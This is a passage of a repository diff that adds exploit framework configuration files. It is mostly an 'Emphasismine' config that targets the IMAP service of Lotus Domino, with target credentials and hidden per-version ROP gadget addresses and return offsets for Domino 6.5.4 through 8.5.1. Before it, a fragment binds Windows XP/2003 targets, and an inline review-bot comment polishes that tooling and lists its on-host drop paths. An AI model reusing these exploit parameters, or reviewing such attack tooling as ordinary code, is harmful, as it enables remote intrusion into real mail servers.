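+<t:os family="windows" name="Windows XP" servicepack="1">
+<t:bindtovalue name="Target" value="XPSP1"/>
+</t:os>
+<t:os family="windows" name="Windows XP" servicepack="2">
+<t:bindtovalue name="Target" value="XPSP2"/>
+</t:os>
+<t:os family="windows" name="Windows XP" servicepack="3">
+<t:bindtovalue name="Target" value="XPSP3"/>
+</t:os>
+<t:os family="windows" name="Windows 2003" servicepack="0">
+<t:bindtovalue name="Target" value="W2K3SP0"/>
+</t:os>
+<t:os family="windows" name="Windows 2003" servicepack="1">
+<t:bindtovalue name="Target" value="W2K3SP1"/>
+</t:os>
+<t:os family="windows" name="Windows 2003" servicepack="2">
+<t:bindtovalue name="Target" value="W2K3SP2"/>
+</t:os>
+</t:or>
+</t:and>
+</t:logic>
+
+</t:config>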
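Review bot: The `ListenLocalPort` parameter in the Callin group carries the same description as `ListenPort` ("Listen port"), so the two are indistinguishable in any UI generated from this config; by analogy with `CallbackLocalPort` it should read `description="Local listen port"`. The redirection block spells the protocol attribute `Tcp` while the Easybee config earlier in this commit uses `TCP`; whether that matters depends on how the loader compares the value, so confirm and normalize to one spelling. The `RemoteMOFPath` and `RemoteMOFTriggerPath` defaults embed a `\.\` segment (`\windows\system32\wbem\.\mof\...`) that is absent from `RemoteDLLPath`, which reads as either deliberate or a leftover and deserves an XML comment stating which. From a detection standpoint, the fixed drop locations under `\windows\system32\wbem\` (`wbemess2.tlb`, `mof\nnetcfg.mof`, `mof\evntprv.mof`) are the on-host artifacts this configuration produces, and they are only overridable through these three parameters.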
BIN
windows/exploits/Emeraldthread-3.0.0.exe
Normal file
892
windows/exploits/Emphasismine-3.4.0.0.xml
Normal file
|
@ -0,0 +1,892 @@
|
|||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<config xmlns="urn:trch"
|
||||
id="0a9ec8318c0f544ba84f56df2e5e3c278844f5bf"
|
||||
name="Emphasismine"
|
||||
version="3.4.0"
|
||||
configversion="3.4.0.0"
|
||||
schemaversion="2.0.0">
|
||||
|
||||
<inputparameters>
|
||||
|
||||
<parameter name="TargetIp" description="Target IP Address" type="IPv4"/>
|
||||
|
||||
<parameter name="TargetPort" description="Port used by the IMAP service" type="TcpPort">
|
||||
<default>143</default>
|
||||
</parameter>
|
||||
|
||||
<parameter name="TargetAcctUsr" type="String" description="Target account username"/>
|
||||
|
||||
<parameter name="TargetAcctPwd" type="String" description="Target account password"/>
|
||||
|
||||
<!-- All plugins that perform blocking network calls must have a NetworkTimeout parameter or its equivalent -->
|
||||
<parameter name="NetworkTimeout" description="Timeout for blocking network calls (in seconds). Use -1 for no timeout." type="S16">
|
||||
<default>60</default>
|
||||
</parameter>
|
||||
|
||||
<!-- This is a template for the version-dependent input parameters -->
|
||||
|
||||
<paramchoice name="DominoVersion" description="The version of Lotus Domino running on the target">
|
||||
<paramgroup name="6.5.4" description="">
|
||||
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
|
||||
<value>0x34C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
|
||||
<value>0x00428463</value>
|
||||
</parameter>
|
||||
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
|
||||
<value>0x0042E038</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
|
||||
<value>0x00420CF5</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
|
||||
<value>0x60132252</value>
|
||||
</parameter>
|
||||
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
|
||||
<value>0x60951039</value>
|
||||
</parameter>
|
||||
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
|
||||
<value>0x607112B4</value>
|
||||
</parameter>
|
||||
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
|
||||
<value>0x60168187</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
|
||||
<value>0x600A371D</value>
|
||||
</parameter>
|
||||
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x609DBEA1</value>
|
||||
</parameter>
|
||||
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x0042845E</value>
|
||||
</parameter>
|
||||
<parameter name="RetEip" description="" type="U32" hidden="true" >
|
||||
<value>0x0041331B</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
|
||||
<paramgroup name="6.5.5" description="">
|
||||
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
|
||||
<value>0x34C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
|
||||
<value>0x004283D3</value>
|
||||
</parameter>
|
||||
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
|
||||
<value>0x0042E038</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
|
||||
<value>0x00420C15</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
|
||||
<value>0x00427989</value>
|
||||
</parameter>
|
||||
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
|
||||
<value>0x60984BC9</value>
|
||||
</parameter>
|
||||
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
|
||||
<value>0x60740B94</value>
|
||||
</parameter>
|
||||
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
|
||||
<value>0x60169917</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
|
||||
<value>0x6016B89E</value>
|
||||
</parameter>
|
||||
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x60A0FCB1</value>
|
||||
</parameter>
|
||||
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004283CE</value>
|
||||
</parameter>
|
||||
<parameter name="RetEip" description="" type="U32" hidden="true" >
|
||||
<value>0x0041323B</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="6.5.5FP1" description="">
|
||||
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
|
||||
<value>0x34C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
|
||||
<value>0x004283D3</value>
|
||||
</parameter>
|
||||
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
|
||||
<value>0x0042E038</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
|
||||
<value>0x00420C15</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
|
||||
<value>0x00427989</value>
|
||||
</parameter>
|
||||
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
|
||||
<value>0x60985499</value>
|
||||
</parameter>
|
||||
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
|
||||
<value>0x60741404</value>
|
||||
</parameter>
|
||||
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
|
||||
<value>0x6099F0D7</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
|
||||
<value>0x6003620D</value>
|
||||
</parameter>
|
||||
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x60A108A1</value>
|
||||
</parameter>
|
||||
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004283CE</value>
|
||||
</parameter>
|
||||
<parameter name="RetEip" description="" type="U32" hidden="true" >
|
||||
<value>0x0041323B</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="7.0" description="">
|
||||
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
|
||||
<value>0x22C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
|
||||
<value>0x0042a001</value>
|
||||
</parameter>
|
||||
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
|
||||
<value>0x0043305c</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
|
||||
<value>0x0041d5a7</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
|
||||
<value>0x0042cbec</value>
|
||||
</parameter>
|
||||
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
|
||||
<value>0x100aa91d</value>
|
||||
</parameter>
|
||||
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
|
||||
<value>0x606f6ee4</value>
|
||||
</parameter>
|
||||
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
|
||||
<value>0x600fa694</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
|
||||
<value>0x00429a6c</value>
|
||||
</parameter>
|
||||
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050A7</value>
|
||||
</parameter>
|
||||
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050AF</value>
|
||||
</parameter>
|
||||
<parameter name="RetEip" description="" type="U32" hidden="true" >
|
||||
<value>0x00413E78</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="7.0.1" description="">
|
||||
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
|
||||
<value>0x22C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
|
||||
<value>0x0042Af00</value>
|
||||
</parameter>
|
||||
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
|
||||
<value>0x0043305C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
|
||||
<value>0x0041D5A7</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
|
||||
<value>0x0042CBEC</value>
|
||||
</parameter>
|
||||
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
|
||||
<value>0x100AA91D</value>
|
||||
</parameter>
|
||||
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
|
||||
<value>0x606F9364</value>
|
||||
</parameter>
|
||||
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
|
||||
<value>0x600FA6D4</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
|
||||
<value>0x00429A6C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050A7</value>
|
||||
</parameter>
|
||||
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050AF</value>
|
||||
</parameter>
|
||||
<parameter name="RetEip" description="" type="U32" hidden="true" >
|
||||
<value>0x00413E78</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="7.0.2" description="">
|
||||
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
|
||||
<value>0x22C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
|
||||
<value>0x0042A001</value>
|
||||
</parameter>
|
||||
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
|
||||
<value>0x0043305C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
|
||||
<value>0x0041D5A7</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
|
||||
<value>0x0042CB58</value>
|
||||
</parameter>
|
||||
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
|
||||
<value>0x100AAADD</value>
|
||||
</parameter>
|
||||
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
|
||||
<value>0x60709A24</value>
|
||||
</parameter>
|
||||
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
|
||||
<value>0x600F8E54</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
|
||||
<value>0x00429A6C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050A7</value>
|
||||
</parameter>
|
||||
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x6001FAC1</value>
|
||||
</parameter>
|
||||
<parameter name="RetEip" description="" type="U32" hidden="true" >
|
||||
<value>0x00413E78</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="7.0.3" description="">
|
||||
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
|
||||
<value>0x22C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
|
||||
<value>0x0042A091</value>
|
||||
</parameter>
|
||||
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
|
||||
<value>0x0043305C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
|
||||
<value>0x0041D637</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
|
||||
<value>0x0042CBE8</value>
|
||||
</parameter>
|
||||
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
|
||||
<value>0x100AA9ED</value>
|
||||
</parameter>
|
||||
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
|
||||
<value>0x6071E614</value>
|
||||
</parameter>
|
||||
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
|
||||
<value>0x600F87E4</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
|
||||
<value>0x00429AFC</value>
|
||||
</parameter>
|
||||
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050B7</value>
|
||||
</parameter>
|
||||
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050BF</value>
|
||||
</parameter>
|
||||
<parameter name="RetEip" description="" type="U32" hidden="true" >
|
||||
<value>0x00413F08</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="7.0.3FP1" description="">
|
||||
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
|
||||
<value>0x22C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
|
||||
<value>0x0042A091</value>
|
||||
</parameter>
|
||||
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
|
||||
<value>0x0043305C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
|
||||
<value>0x0041D637</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
|
||||
<value>0x0042CBE8</value>
|
||||
</parameter>
|
||||
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
|
||||
<value>0x100AA9ED</value>
|
||||
</parameter>
|
||||
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
|
||||
<value>0x6071e674</value>
|
||||
</parameter>
|
||||
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
|
||||
<value>0x600f8824</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
|
||||
<value>0x00429AFC</value>
|
||||
</parameter>
|
||||
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050B7</value>
|
||||
</parameter>
|
||||
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050BF</value>
|
||||
</parameter>
|
||||
<parameter name="RetEip" description="" type="U32" hidden="true" >
|
||||
<value>0x00413F08</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="7.0.4" description="">
|
||||
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
|
||||
<value>0x22C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
|
||||
<value>0x0042A271</value>
|
||||
</parameter>
|
||||
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
|
||||
<value>0x0043305C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
|
||||
<value>0x0041d817</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
|
||||
<value>0x0042cdde</value>
|
||||
</parameter>
|
||||
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
|
||||
<value>0x100a9e3d</value>
|
||||
</parameter>
|
||||
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
|
||||
<value>0x60728db4</value>
|
||||
</parameter>
|
||||
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
|
||||
<value>0x60150da4</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
|
||||
<value>0x00429cdc</value>
|
||||
</parameter>
|
||||
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x00405107</value>
|
||||
</parameter>
|
||||
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x0040510f</value>
|
||||
</parameter>
|
||||
<parameter name="RetEip" description="" type="U32" hidden="true" >
|
||||
<value>0x00413f98</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="8.0" description="">
|
||||
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
|
||||
<value>0x22C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
|
||||
<value>0x00429fa1</value>
|
||||
</parameter>
|
||||
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
|
||||
<value>0x0043205c</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
|
||||
<value>0x0041d567</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
|
||||
<value>0x0042caf8</value>
|
||||
</parameter>
|
||||
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
|
||||
<value>0x60aa7dab</value>
|
||||
</parameter>
|
||||
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
|
||||
<value>0x60764914</value>
|
||||
</parameter>
|
||||
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
|
||||
<value>0x60153b14</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
|
||||
<value>0x00429a12</value>
|
||||
</parameter>
|
||||
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x00405067</value>
|
||||
</parameter>
|
||||
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x0040506f</value>
|
||||
</parameter>
|
||||
<parameter name="RetEip" description="" type="U32" hidden="true" >
|
||||
<value>0x00413cd8</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="8.0.1" description="">
|
||||
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
|
||||
<value>0x22C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
|
||||
<value>0x0042a001</value>
|
||||
</parameter>
|
||||
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
|
||||
<value>0x0043205c</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
|
||||
<value>0x0041d5c7</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
|
||||
<value>0x0042cb58</value>
|
||||
</parameter>
|
||||
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
|
||||
<value>0x60abf84b</value>
|
||||
</parameter>
|
||||
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
|
||||
<value>0x60772714</value>
|
||||
</parameter>
|
||||
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
|
||||
<value>0x601549d4</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
|
||||
<value>0x00429a72</value>
|
||||
</parameter>
|
||||
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050b7</value>
|
||||
</parameter>
|
||||
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050bf</value>
|
||||
</parameter>
|
||||
<parameter name="RetEip" description="" type="U32" hidden="true" >
|
||||
<value>0x00413d38</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="8.0.2" description="">
|
||||
<!-- Find non-nIMAP.exe offsets -->
|
||||
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
|
||||
<value>0x22C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
|
||||
<value>0x0042a001</value>
|
||||
</parameter>
|
||||
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
|
||||
<value>0x0043205c</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
|
||||
<value>0x0041d5c7</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
|
||||
<value>0x0042cb58</value>
|
||||
</parameter>
|
||||
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
|
||||
<value>0x60Ace7ab</value>
|
||||
</parameter>
|
||||
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
|
||||
<value>0x6077a774</value>
|
||||
</parameter>
|
||||
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
|
||||
<value>0x600f9b04</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
|
||||
<value>0x00429a72</value>
|
||||
</parameter>
|
||||
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050b7</value>
|
||||
</parameter>
|
||||
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050bf</value>
|
||||
</parameter>
|
||||
<parameter name="RetEip" description="" type="U32" hidden="true" >
|
||||
<value>0x00413d38</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="8.5" description="">
|
||||
<!-- Find non-nIMAP.exe offsets -->
|
||||
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
|
||||
<value>0x22C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
|
||||
<value>0x0042a361</value>
|
||||
</parameter>
|
||||
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
|
||||
<value>0x0043305c</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
|
||||
<value>0x0042d17a</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
|
||||
<value>0x0042ceb8</value>
|
||||
</parameter>
|
||||
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
|
||||
<value>0x60b8de5b</value>
|
||||
</parameter>
|
||||
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
|
||||
<value>0x606068f8</value>
|
||||
</parameter>
|
||||
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
|
||||
<value>0x600f37c4</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
|
||||
<value>0x00429dd4</value>
|
||||
</parameter>
|
||||
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050b7</value>
|
||||
</parameter>
|
||||
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050bf</value>
|
||||
</parameter>
|
||||
<parameter name="RetEip" description="" type="U32" hidden="true" >
|
||||
<value>0x00414068</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="8.5.1" description="">
|
||||
<!-- Find non-nIMAP.exe offsets -->
|
||||
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
|
||||
<value>0x22C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
|
||||
<value>0x0042b5d0</value>
|
||||
</parameter>
|
||||
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
|
||||
<value>0x0043305C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
|
||||
<value>0x0041db67</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
|
||||
<value>0x0042d4a0</value>
|
||||
</parameter>
|
||||
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
|
||||
<value>0x620aa96d</value>
|
||||
</parameter>
|
||||
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
|
||||
<value>0x60630e48</value>
|
||||
</parameter>
|
||||
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
|
||||
<value>0x6015db64</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
|
||||
<value>0x42a146</value>
|
||||
</parameter>
|
||||
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x4050a7</value>
|
||||
</parameter>
|
||||
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x4050af</value>
|
||||
</parameter>
|
||||
<parameter name="RetEip" description="" type="U32" hidden="true" >
|
||||
<value>0x4140c8</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="8.5.1FP1" description="">
|
||||
<!-- Find non-nIMAP.exe offsets -->
|
||||
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
|
||||
<value>0x22C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
|
||||
<value>0x0042a831</value>
|
||||
</parameter>
|
||||
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
|
||||
<value>0x0043305C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
|
||||
<value>0x0042e761</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
|
||||
<value>0x0042d388</value>
|
||||
</parameter>
|
||||
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
|
||||
<value>0x620aa96d</value>
|
||||
</parameter>
|
||||
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
|
||||
<value>0x606311b8</value>
|
||||
</parameter>
|
||||
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
|
||||
<value>0x6015dbd4</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
|
||||
<value>0x0042a2a6</value>
|
||||
</parameter>
|
||||
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050a7</value>
|
||||
</parameter>
|
||||
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050af</value>
|
||||
</parameter>
|
||||
<parameter name="RetEip" description="" type="U32" hidden="true" >
|
||||
<value>0x0041413c</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="8.5.1FP2" description="">
|
||||
<!-- Find non-nIMAP.exe offsets -->
|
||||
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
|
||||
<value>0x22C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
|
||||
<value>0x0042a831</value>
|
||||
</parameter>
|
||||
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
|
||||
<value>0x0043305C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
|
||||
<value>0x0042e761</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
|
||||
<value>0x0042d388</value>
|
||||
</parameter>
|
||||
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
|
||||
<value>0x620aa96d</value>
|
||||
</parameter>
|
||||
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
|
||||
<value>0x60631f08</value>
|
||||
</parameter>
|
||||
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
|
||||
<value>0x6015d2d4</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
|
||||
<value>0x0042a2a6</value>
|
||||
</parameter>
|
||||
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050a7</value>
|
||||
</parameter>
|
||||
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050af</value>
|
||||
</parameter>
|
||||
<parameter name="RetEip" description="" type="U32" hidden="true" >
|
||||
<value>0x0041413c</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="8.5.1FP3" description="">
|
||||
<!-- Find non-nIMAP.exe offsets -->
|
||||
